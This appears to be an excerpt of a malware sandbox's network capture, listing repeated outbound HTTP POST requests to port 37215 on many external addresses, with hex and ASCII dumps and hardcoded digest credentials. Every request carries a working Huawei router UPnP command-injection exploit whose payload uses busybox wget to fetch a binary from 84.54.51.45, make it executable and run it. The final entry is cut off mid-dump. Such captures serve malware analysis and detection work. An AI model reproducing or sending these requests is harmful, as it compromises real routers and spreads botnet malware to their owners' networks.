                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            36192.168.2.155784241.43.37.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732079983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            37192.168.2.153938041.231.199.4837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732104063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            38192.168.2.153966041.30.114.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732162952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            39192.168.2.155711041.59.128.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732218981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            40192.168.2.154728641.195.188.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732233047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            41192.168.2.155674041.12.30.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732233047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            42192.168.2.153471841.32.89.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732279062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            43192.168.2.155331841.115.204.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732306004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            44192.168.2.153288041.251.53.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732362986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            45192.168.2.153779041.69.146.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732363939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 